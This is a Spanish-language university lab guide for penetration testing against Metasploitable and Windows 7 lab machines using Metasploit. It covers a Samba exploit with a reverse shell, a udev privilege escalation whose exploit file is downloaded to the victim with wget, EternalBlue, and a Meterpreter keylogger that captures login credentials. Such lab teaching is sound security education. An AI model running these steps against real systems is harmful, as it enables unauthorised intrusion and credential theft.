Está en la página 1de 17

Implementación EPA

Subdirección de Diseño instruccional

GESTIÓN DE
CSY Nombre de la
Sigla Asignatura RIESGO EN REDES Tiempo 3 horas
6122 Asignatura
CORPORATIVAS
Experiencia de Aprendizaje N° 3 Evaluación de controles de Seguridad
Actividad N° 3.3 Explotación de vulnerabilidades en Sistemas Operativos

Nombre del Recurso Didáctico Explotación de vulnerabilidades en SO Windows y Linux

1. Descripción General Actividad:

1. Esta evaluación tiene carácter formativo, es decir: busca evaluar lo aprendido hasta el momento en
la asignatura.
2. Esta evaluación será en formato grupal.
3. La evaluación podrá realizarse en horario de clases, como un encargo con plazo de entrega.

2. Descripción Específica Actividad:

Contexto de la Evaluación:

En esta actividad el estudiante deberá realizar la explotación de vulnerabilidades en Sistemas operativos


Windows y Linux con la herramienta Metasploit con el propósito de obtener las evidencias en cada caso.

Instrucciones de la Evaluación:

Debe revisar la guía adjunta y seguir los pasos propuestos con la ayuda de su profesor

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

Título: Hacking a Sistema Operativo

A.- Hacking a servicio SAMBA

1.- Levante la máquina virtual Kali Linux con la interfaz de red en modo Red NAT

2.- Instale la máquina virtual Metasploitable con la interfaz de red en modo Red NAT

3.- Levante la aplicación Metasploit en su máquina Kali con el comando:

# msfconsole

4.- Realice un mapping de servicios de la maquina Metasploitable con el comando:

# nmap direccion_ip

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

5.- Confirme que tiene un servicio activo en el puerto 445 y realice un footprinting con el siguiente comando:

msf > nmap –sV –p 445 direccion_ip

6.- Realice el reconocimiento del servicio SMB utilizando el auxiliar de Metasploit

7.- Encuentre una vulnerabilidad que contenga un exploit para el servicio descubierto

8.- Encuentre el exploit de la vulnerabilidad 2007-2447 con el siguiente comando:

msf > search cve:2007-2447

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

9.- Cargue el exploit encontrado con el comando:

msf > use nombre_exploit

10.- Configure los siguientes parámetros:

 Set RHOST direccion_ip


 Set RPORT 445

Y confirme la operación con el comando:

msf > show options

11.- Revise los payloads disponibles con el comando show payloads

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

12.- Seleccione el payload con el comando set payload cmd/unix/reverse y revise los parámetros de
configuración con el comando:

msf > show options

13.- Seleccione las siguientes opciones:

 Set LHOST direccion_ip

14.- Ejecute el exploit con el comando:

msf > exploit

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

15.- Valide a través de algún comando Linux que está conectado a la interfaz de comando del servidor sin
autenticación.

B.- Hacking con escalamiento de privilegios

1.- Realice un footprinting al puerto de servicio 3632 en la maquina Metasploitable

2.- Ejecute la aplicación msfconsole en su máquina Kali y busque un exploit asociado al servicio mencionado.

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

3.- Cargue el exploit encontrado y configure los parámetros correspondientes:

4.- Busque un payload que permita ejecutar comandos en forma remota.

5.- Cargue el payload seleccionado y configure los parámetros adicionales.

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

6.- Ejecute el exploit confirme el usuario con el cual está conectado.

7.- Confirme con algún comando la conexión remota:

B.1.- Escalamiento de privilegios en Linux

1.- De la sesión anterior, confirme la versión del servicio “udev”

2.- Busque en el sitio CVE una vulnerabilidad de este servicio que permita realizar el escalamiento de
privilegios.

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

3.- Seleccione la vulnerabilidad encontrada

4.- Busque el exploit asociado en el sitio www.exploit-db.com y bájelo a su disco local en Kali

5.- Cree un directorio en el home del servidor web y copie el exploit a dicho directorio

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

6.- Levante el servicio web de apache

7.- Baje el exploit a la maquina victima con el siguiente comando:

wget http://ip_kali/share/8572.c

8.- Compile el exploit con el siguiente comando y confirme la operación:

9.- Cree el script de acuerdo con las instrucciones del exploit


Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.
Implementación EPA
Subdirección de Diseño instruccional

10.- Levante el servicio netcat en su máquina Kali con el siguiente comando:

11.- Visualice el PID del servicio udev

12.- Ejecute el exploit de acuerdo a las instrucciones

13.- Compruebe la conexión en su servidor Kali

C.- Hacking en Windows 7

1.- Iniciar Kali con la interfaz de red en modo Red NAT

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

2.- Configure el teclado en español

3.- Ejecute Metasploit con el comando:

# msfconsole

4.- Levante la máquina Windows 7 con la interfaz de red en modo Red NAT y visualice su dirección IP

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

5.- Busque el auxiliar para chequear la vulnerabilidad

6.- Cargue el exploit y configúrelo con los parámetros de la máquina Windows 7

7.- Ejecute el auxiliar y confirme que el servidor es vulnerable

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

8.- Cargue el exploit de EternalBlue

9.- Configure los parámetros del servidor Windows 2008

10.- Confirme que el target está correcto

11.- Ejecute el exploit


Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.
Implementación EPA
Subdirección de Diseño instruccional

12.- Genere la evidencia de la explotación

13.- Inicie el browser en la maquina victima Windows 7 y ejecute el siguiente comando en la consola de
Meterpreter

meterpreter > ps

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

14.- Realice la migración al proceso de Internet Explorer

15.- Active el keylogger con el siguiente comando

16.- Desde la máquina Windows 7, conéctese al sitio Altoro Mutual y realice el login del usuario

17.- Obtenga las credenciales del usuario

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.


Implementación EPA
Subdirección de Diseño instruccional

Docente Diseñador Jaime Gómez Revisor metodológico Carlos Carvacho G.

También podría gustarte